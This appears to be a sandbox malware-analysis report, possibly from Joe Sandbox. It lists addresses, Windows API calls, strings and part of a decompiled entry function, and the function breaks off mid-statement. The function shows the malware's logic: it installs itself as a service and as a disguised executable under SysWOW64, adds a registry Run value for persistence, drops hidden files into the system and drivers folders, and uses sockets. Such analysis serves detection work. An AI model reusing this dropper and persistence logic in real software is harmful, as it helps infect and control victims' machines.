0x0032d7f4
0x0032d81f
0x0032d825
0x0032d828
0x0032d828
0x0032d82a
0x0032d830
0x0032d832
0x0032d85b
0x0032d85b
0x0032d85d
0x00000000
0x00000000
0x0032d878
0x0032d87f
0x0032d884
0x0032d887
0x0032d889
0x00000000
0x00000000
0x0032d88f
0x0032d895
0x0032d897
0x0032d897
0x0032d89d
0x0032d8a2
0x0032d8a4
0x0032d8a7
0x0032d8ad
0x0032d8ad
0x00000000
0x0032d834
0x0032d834
0x0032d836
0x0032d836
0x0032d839
0x0032d839
0x0032d83b
0x0032d83c
0x0032d83c
0x0032d842
0x0032d847
0x0032d850
0x0032d855
0x0032d858
0x0032d858
0x00000000
0x0032d858
0x0032d832
0x0032d783
0x0032d792
0x0032d797
0x0032d79a
0x0032d79c
0x00000000
0x00000000
0x0032d773
0x0032d778
0x0032d77b
0x0032d77d
0x00000000
0x00000000
0x0032d77d
0x00000000
0x0032d783
0x0032d70d
0x0032d712
0x0032d718
0x0032d71f
0x0032d721
0x00000000
0x00000000
0x0032d73d
0x0032d744
0x0032d749
0x0032d74c
0x0032d74e
0x00000000
0x00000000
0x00000000
0x0032d74e
0x0032d6d3
0x0032d6f0
0x0032d6f7
0x0032d6fc
0x0032d6ff
0x0032d701
0x00000000
0x00000000
0x00000000
0x0032d701
0x0032d67a
0x0032d67b
0x0032d67c
0x0032d6bb
0x0032d6bb
0x0032d6c0
0x0032d6c3
0x0032d6c5
0x00000000
0x00000000
0x0032d67f
0x0032d696
0x0032d69d
0x0032d6a2
0x0032d6a5
0x0032d6a7
0x00000000
0x00000000
0x0032d6b0
0x0032d6b0
0x0032d6b3
0x0032d6b4
0x0032d6b5
0x0032d6b5
0x00000000
0x0032d6bb
0x0032cbc7
0x0032cbca
0x0032d5f2
0x0032d5f8
0x0032d5fa
0x0032d600
0x0032d611
0x0032d616
0x0032d61e
0x0032d621
0x0032d623
0x0032d62e
0x0032d635
0x0032d637
0x0032d63d
0x0032d643
0x0032d649
0x0032d64f
0x0032d655
0x0032d65a
0x0032d65a
0x0032d637
0x0032d623
0x00000000
0x0032d5fa
0x0032cbd0
0x0032cbd3
0x0032d5e1
0x0032cdec
0x00000000
0x0032cdec
0x0032cbd9
0x0032d589
0x0032d589
0x0032d589
0x0032d58b
0x0032d58b
0x0032d58b
0x0032d591
0x0032d593
0x00000000
0x00000000
0x0032d595
0x0032d598
0x0032d59a
0x00000000
0x00000000
0x0032d59c
0x0032d59e
0x0032d59e
0x0032d5a1
0x0032d5a1
0x0032d5a3
0x0032d5a5
0x00000000
0x00000000
0x0032d5a7
0x0032d5aa
0x0032d5c3
0x0032d5c5
0x00000000
0x0032d5c5
0x0032d5ac
0x0032d5ad
0x0032d5b0
0x0032d5b3
0x00000000
0x00000000
0x00000000
0x0032d5b5
0x0032d5c8
0x0032d5c8
0x0032d5cb
0x0032d5cb
0x00000000
0x0032d5d3
0x0032cbdf
0x0032cbe2
0x0032ce26
0x0032ce2c
0x0032ce2e
0x0032ce31
0x0032ce34
0x0032ce36
0x0032cea0
0x0032cea0
0x0032cea8
0x0032cea8
0x0032ceaf
0x0032ceb9
0x0032cebf
0x0032cec2
0x0032d53e
0x0032d53e
0x0032d541
0x00000000
0x00000000
0x0032cec9
0x0032cecc
0x00000000
0x00000000
0x0032ced2
0x0032ced5
0x0032d519
0x0032d519
0x0032d524
0x0032d526
0x0032d529
0x0032d53b
0x00000000
0x0032cedb
0x0032cee8
0x0032ceed
0x0032ceef
0x0032cef2
0x0032cef4
0x0032cef9
0x0032cefe
0x0032cf00
0x0032cf00
0x0032cf02
0x0032cf02
0x0032cf04
0x0032cf06
0x0032cf0b
0x0032cf0d
0x0032cf12
0x0032cf14
0x0032cf1a
0x0032cf20
0x0032cf20
0x0032cf1c
0x0032cf1c
0x0032cf1c
0x0032cf25
0x0032cf25
0x0032cf27
0x0032cf29
0x0032cf2b
0x0032cf81
0x0032cf83
0x0032cfdc
0x0032cfe1
0x0032d020
0x0032d025
0x00000000
0x00000000
0x0032d033
0x0032d039
0x0032d03f
0x0032d042
0x0032d042
0x0032d044
0x0032d045
0x0032d045
0x0032d049
0x0032d04b
0x0032d04d
0x0032d04f
0x0032d057
0x0032d059
0x0032d059
0x0032d057
0x0032d06d
0x0032d073
0x0032d07a
0x0032d07a
0x0032d07d
0x0032d07d
0x0032d07f
0x0032d080
0x0032d080
0x0032d084
0x0032d084
0x00000000
0x0032d084
0x0032cfef
0x0032cff5
0x0032cffb
0x0032cffe
0x0032cffe
0x0032d000
0x0032d001
0x0032d001
0x0032d005
0x0032d005
0x00000000
0x0032cf85
0x0032cfb1
0x0032cfbe
0x0032cfc3
0x0032cfc9
0x0032cfcc
0x0032cfcc
0x0032d007
0x0032d007
0x0032d009
0x00000000
0x00000000
0x0032d00b
0x00000000
0x0032cfcf
0x0032cfcf
0x0032cfd1
0x0032cfd2
0x0032cfd4
0x00000000
0x0032cfd6
0x0032cfd8
0x00000000
0x0032cfd8
0x0032cfd4
0x0032cf2d
0x0032cf2d
0x0032cf2d
0x0032cf30
0x0032cf32
0x0032cf32
0x0032cf32
0x0032cf58
0x0032cf58
0x0032cf58
0x0032cf5a
0x0032cf5b
0x0032cf5b
0x0032cf61
0x0032cf63
0x0032cf65
0x0032d086
0x0032d086
0x0032d089
0x0032d0fe
0x0032d0fe
0x0032d104
0x0032d104
0x0032d105
0x0032d10c
0x0032d112
0x0032d112
0x0032d115
0x0032d124
0x0032d129
0x0032d129
0x0032d12c
0x0032d130
0x0032d13e
0x0032d144
0x0032d145
0x0032d147
0x0032d155
0x0032d155
0x0032d147
0x0032d177
0x0032d179
0x0032d17c
0x0032d33e
0x0032d372
0x0032d37f
0x0032d384
0x0032d38a
0x0032d38d
0x0032d390
0x0032d390
0x0032d392
0x0032d393
0x0032d393
0x0032d397
0x0032d399
0x0032d39b
0x0032d39d
0x0032d3a5
0x0032d3a7
0x0032d3a7
0x0032d3a5
0x0032d3af
0x0032d3bd
0x0032d3c3
0x0032d3c7
0x0032d3d5
0x0032d3db
0x0032d3dc
0x0032d3de
0x0032d3ec
0x0032d3ec
0x0032d3de
0x0032d40e
0x0032d410
0x0032d413
0x0032d420
0x0032d428
0x0032d42f
0x0032d435
0x0032d439
0x0032d447
0x0032d44d
0x0032d44e
0x0032d450
0x0032d45b
0x0032d45b
0x0032d450
0x0032d461
0x0032d461
0x00000000
0x0032d182
0x0032d18d
0x0032d195
0x0032d19c
0x0032d1a2
0x0032d1a6
0x0032d1b4
0x0032d1bb
0x0032d1bd
0x0032d1c8
0x0032d1c8
0x0032d1bd
0x0032d1da
0x0032d1e1
0x0032d1e7
0x0032d1e8
0x0032d1ea
0x0032d468
0x0032d468
0x0032d46b
0x0032d47a
0x0032d47f
0x0032d47f
0x0032d482
0x0032d485
0x0032d48b
0x0032d48e
0x0032d496
0x0032d49b
0x0032d4a2
0x0032d4ac
0x0032d4b1
0x0032d4d8
0x0032d4de
0x0032d4e4
0x0032d4e6
0x0032d500
0x0032d506
0x0032d513
0x0032d4e8
0x0032d4f4
0x0032d4fc
0x0032d4fc
0x0032d4e6
0x0032d48e
0x00000000
0x0032d1f0
0x0032d1fd
0x0032d231
0x0032d23e
0x0032d243
0x0032d249
0x0032d24c
0x0032d24f
0x0032d24f
0x0032d251
0x0032d252
0x0032d252
0x0032d256
0x0032d258
0x0032d25a
0x0032d25c
0x0032d264
0x0032d266
0x0032d266
0x0032d264
0x0032d26e
0x0032d27c
0x0032d282
0x0032d286
0x0032d294
0x0032d29a
0x0032d29b
0x0032d29d
0x0032d2ab
0x0032d2ab
0x0032d29d
0x0032d2cd
0x0032d2cf
0x0032d2d2
0x0032d2e3
0x0032d2eb
0x0032d2f2
0x0032d2f8
0x0032d2fc
0x0032d30e
0x0032d314
0x0032d315
0x0032d317
0x0032d326
0x0032d326
0x0032d317
0x0032d2fc
0x00000000
0x0032d2d2
0x0032d1ea
0x0032d17c
0x0032d08b
0x0032d094
0x0032d097
0x0032d097
0x0032d09a
0x0032d09d
0x0032d0bb
0x0032d0bb
0x0032d0c2
0x0032d0c4
0x0032d0c6
0x0032d0f4
0x0032d0f9
0x00000000
0x0032d0f9
0x0032d0c8
0x0032d0ca
0x0032d0d3
0x0032d0d5
0x00000000
0x00000000
0x0032d0d7
0x00000000
0x0032d0d7
0x0032d0cc
0x00000000
0x00000000
0x00000000
0x00000000
0x0032d09f
0x0032d09f
0x0032d09f
0x0032d0a8
0x0032d0ab
0x0032d0ae
0x0032d0b5
0x0032d0b6
0x0032d0b6
0x0032d0b6
0x0032d0b6
0x00000000
0x0032d09f
0x0032cf6b
0x0032cf72
0x0032cf74
0x0032cf7a
0x0032d013
0x0032d013
0x0032d015
0x0032d01d
0x0032d01d
0x0032d013
0x00000000
0x0032cf35
0x0032cf35
0x0032cf37
0x0032cf38
0x0032cf3a
0x00000000
0x0032cf3c
0x0032cf3c
0x0032cf47
0x0032cf4c
0x0032cf52
0x0032cf55
0x00000000
0x0032cf55
0x0032cf3a
0x0032cf2b
0x0032ced5
0x0032d547
0x0032d54e
0x00000000
0x00000000
0x0032d554
0x0032d557
0x00000000
0x00000000
0x0032d55d
0x0032d563
0x00000000
0x00000000
0x0032d56c
0x0032d577
0x0032d57d
0x0032d583
0x0032ce38
0x0032ce38
0x0032ce38
0x0032ce3b
0x0032ce3f
0x0032ce3f
0x0032ce40
0x0032ce89
0x0032ce90
0x0032ce42
0x0032ce42
0x0032ce42
0x0032ce43
0x0032ce76
0x0032ce7d
0x0032ce80
0x0032ce45
0x0032ce45
0x0032ce46
0x0032ce56
0x0032ce5d
0x0032ce60
0x0032ce60
0x0032ce46
0x0032ce43
0x0032ce98
0x0032ce99
0x0032ce9c
0x0032ce9c
0x00000000
0x0032ce3b
0x0032ce36
0x0032cbe8
0x0032cbeb
0x00000000
0x00000000
0x0032cbf1
0x0032cbf5
0x0032cdf2
0x0032cdfa
0x0032ce04
0x0032ce09
0x0032ce13
0x0032ce16
0x0032ce1b
0x00000000
0x0032ce1b
0x0032cbfb
0x0032cc00
0x0032cc02
0x00000000
0x00000000
0x0032cc08
0x0032cc0d
0x0032cc10
0x0032cc16
0x0032cdd2
0x0032cdd2
0x0032cdd8
0x0032cde2
0x0032cde7
0x00000000
0x0032cc1c
0x0032cc28
0x0032cc35
0x0032cc3a
0x0032cc3b
0x0032cc47
0x0032cc4a
0x0032cc64
0x0032cc64
0x0032cc66
0x0032cc4c
0x0032cc55
0x0032cc58
0x0032cc5b
0x0032cc62
0x0032cc63
0x0032cc63
0x00000000
0x0032cc68
0x0032cc8d
0x0032cc9a
0x0032cc9f
0x0032ccb4
0x0032ccba
0x0032ccbd
0x0032ccc0
0x0032ccdc
0x0032cce2
0x0032cce5
0x0032cce7
0x0032cdcc
0x0032cced
0x0032cced
0x0032ccf3
0x0032ccfe
0x0032cd21
0x0032cd2a
0x0032cd31
0x0032cd3b
0x0032cd47
0x0032cd4d
0x0032cd52
0x0032cd55
0x0032cd77
0x0032cd7d
0x0032cd7f
0x0032cd89
0x0032cd98
0x0032cd9d
0x0032cda5
0x0032cda5
0x0032cdaa
0x0032cdac
0x0032cdad
0x0032cdb2
0x0032cdb2
0x0032cdb8
0x0032cdc4
0x0032cdc4
0x0032cce7
0x00000000
0x0032ccc0
0x0032cc66
0x0032cc16
0x0032dad2
0x0032dad5
0x0032dadb
0x00000000
0x0032cb60
0x0032cb63
0x00000000
0x0032cb63
0x0032cb5e
0x0032ca4b
0x0032ca4e
0x0032ca4e
0x00000000
0x0032c9d2
0x0032c9d2
0x0032c9d8
0x0032c9dd
0x0032c9e0
0x0032c9e1
0x0032c9e3
0x0032c9e9
0x0032c9f1
0x0032c9fb
0x00000000
0x00000000
0x00000000
0x0032c9fb
0x00000000
0x0032c9d8
0x0032c9d0
0x0032c9a5
0x0032c9ab
0x0032c9b2
0x00000000
0x00000000
0x00000000
0x0032c9b2
0x0032c92f
0x0032c935
0x00000000
0x00000000
0x00000000

APIs

closesocket.WS2_32(?), ref: 0032CA4E
closesocket.WS2_32(?), ref: 0032CB63
GetTempPathA.KERNEL32(00000120,?), ref: 0032CC28
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0032CCB4
WriteFile.KERNEL32(0032A4B3,?,-000000E8,?,00000000), ref: 0032CCDC
CloseHandle.KERNEL32(0032A4B3), ref: 0032CCED
wsprintfA.USER32 ref: 0032CD21
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0032CD77
WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0032CD89
CloseHandle.KERNEL32(?), ref: 0032CD98
CloseHandle.KERNEL32(?), ref: 0032CD9D
DeleteFileA.KERNEL32(?), ref: 0032CDC4
CloseHandle.KERNEL32(0032A4B3), ref: 0032CDCC
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0032CFB1
GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0032CFEF
GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0032D033
lstrcatA.KERNEL32(?,03E00108), ref: 0032D10C
SetFileAttributesA.KERNEL32(?,00000080), ref: 0032D155
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0032D171
WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000), ref: 0032D195
CloseHandle.KERNEL32(00000000), ref: 0032D19C
SetFileAttributesA.KERNEL32(?,00000002), ref: 0032D1C8
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0032D231
lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0032D27C
SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0032D2AB
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0032D2C7
WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0032D2EB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0032D2F2
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0032D326
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0032D372
lstrcatA.KERNEL32(?,03E00108,?,?,?,?,?,?,?,00000100), ref: 0032D3BD
SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0032D3EC
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0032D408
WriteFile.KERNEL32(00000000,03E0012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0032D428
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0032D42F
SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0032D45B
CreateProcessA.KERNEL32(?,00330264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0032D4DE
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0032D4F4
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0032D4FC
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0032D513
closesocket.WS2_32(?), ref: 0032D56C
Sleep.KERNEL32(000003E8), ref: 0032D577
ExitProcess.KERNEL32 ref: 0032D583
wsprintfA.USER32 ref: 0032D81F

Part of subcall function 0032C65C: send.WS2_32(00000000,?,00000000), ref: 0032C74B

closesocket.WS2_32(?), ref: 0032DAD5

Strings

localcfg, xrefs: 0032CA89, 0032CA93, 0032CAC0, 0032CAD2, 0032CE4F, 0032CE6F, 0032D8D3, 0032D8FC
\, xrefs: 0032D39D
\, xrefs: 0032D3A7
X 3, xrefs: 0032C927, 0032C93C, 0032C9BE
drivers\, xrefs: 0032D067
time_cfg, xrefs: 0032C95B, 0032C962, 0032C971, 0032C984
except_info, xrefs: 0032D8CD, 0032D8D2, 0032D8FB
lid_file_upd, xrefs: 0032CE6A
flags_upd, xrefs: 0032CE4A
wtm_w, xrefs: 0032C96C
ps, xrefs: 0032CA4E, 0032CB63, 0032D56C, 0032DAD5
local_time, xrefs: 0032CACD
4, xrefs: 0032D9F7
.dat, xrefs: 0032D0D7, 0032D138, 0032D1AE, 0032D1D4, 0032D28E, 0032D308, 0032D3CF, 0032D441
wtm_r, xrefs: 0032C97F
work_srv, xrefs: 0032D607, 0032D60F, 0032D62C
C:\Windows\SysWOW64\shayesoq\lagavljy.exe, xrefs: 0032CC10, 0032CCF3, 0032D975, 0032D98E
wtm_c, xrefs: 0032C956
@, xrefs: 0032D754
.sys, xrefs: 0032D0CC
srv_time, xrefs: 0032CABB

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\shayesoq\lagavljy.exe$X 3$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$ps$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
API String ID: 562065436-1452447324
Opcode ID: 2eb406381ddf793fc178f389f24e074bc6c5fa85cb69ad587cf1487dcd8e0624
Instruction ID: fe2c55a539c6c37952a1f0233bce008c568d05f3bc4f8f30f6dfb5749514f34f
Opcode Fuzzy Hash: 2eb406381ddf793fc178f389f24e074bc6c5fa85cb69ad587cf1487dcd8e0624
Instruction Fuzzy Hash: 0BB2B272900228AFEB27DFA4EDC6EEE7BBCEB08300F154069F545A7191D7709A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00329A6B, Relevance: 100.5, APIs: 48, Strings: 9, Instructions: 799
stringsleepregistryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00326511); // executed
				E0032EC54(); // executed
				_t475 =  *0x33201f; // 0x1
				if(_t475 != 0) {
					__eflags =  *0x3333d8; // 0x0
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0032405E, 0, 0, 0); // executed
						__imp__#115(0x1010,  &_v1672); // executed
						E0032E52E(_t449, __eflags);
						E0032EAAF(1, 0);
						E00321D96(_t438, 0x332118);
						E003280C9(_t438); // executed
						CreateThread(0, 0, E0032877E, 0, 0, 0); // executed
						E00325E6C(__eflags);
						E00323132();
						E0032C125(__eflags);
						E00328DB1(_t438);
						Sleep(0xbb8); // executed
						E0032C4EE();
						while(1) {
							__eflags =  *0x3333d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x3333d0 - 0x186a0;
							if(_t239 -  *0x3333d0 < 0x186a0) {
								L131:
								Sleep(0x2710); // executed
								continue;
							}
							L129:
							_t238 = E0032C913(); // executed
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x3333d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x3333d8); // executed
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0032EE2A(_t438, 0x3333d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0032EF00( &_v672,  &_v671);
						_t436 = E0032ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x3322f8;
					_a12 = _t248;
					_t250 = E0032EE95(_a12, E00322544(0x3322f8, 0x330a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0032EE2A(_t438, 0x3322f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E003296AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112);
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0032EF00("C:\\Windows\\SysWOW64\\shayesoq\\lagavljy.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0032EE95(_a12, E00322544(0x3322f8, 0x330a38, 4, 0xe4, 0xc8));
							E0032EE2A(_t438, 0x3322f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0032EE95(_a12, E00322544(_t459, 0x330a28, 4, 0xe4, 0xc8));
								E0032EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00326EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E003298F2(_t438);
										L19:
										ExitProcess(0);
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x3333b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00329961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64);
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0032EF00("shayesoq",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0032ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0032EE08(0x332184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x332184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0032ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0032EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0032EE08(0x3333d8,  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x332cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0032ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0032EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00329145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00324280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0032675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0032EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00322544(_t459, 0x330a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0032EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E003299D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0032EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00326DC2(_t438) ^ 0x61616161;
										__eflags = _t328;
										_push(_t328);
										E0032F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00322544(_t459,  &E003306AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0032EE2A(_t438, _t459, 0, _t454);
										E0032EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0032EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
											if( *((char*)(_t357 + 1)) == 0x3a) {
												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
												if( *((char*)(_t357 + 2)) == 0x5c) {
													_t358 = _v40;
													_t438 = _t358[3];
													_a15 = _t358[3];
													_t358[3] = 0;
													_t359 = GetDriveTypeA(_t358);
													__eflags = _t359 - 2;
													if(_t359 != 2) {
														_t438 = _v40;
														_v40[3] = _a15;
														lstrcatA( &_v1272, E00322544(_t459, 0x330a38, 4, 0xe4, 0xc8));
														E0032EE2A(_v40, _t459, 0, _t454);
														_t469 = _t469 + 0x20;
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														lstrcatA( &_v1272,  &_v372);
														__eflags = _v372 - 0x22;
														if(_v372 != 0x22) {
															lstrcatA( &_v1272, "\"");
														}
														_v36 = 1;
													}
												}
											}
										}
										__eflags = _v32;
										if(_v32 != 0) {
											__eflags = _v28;
											if(_v28 != 0) {
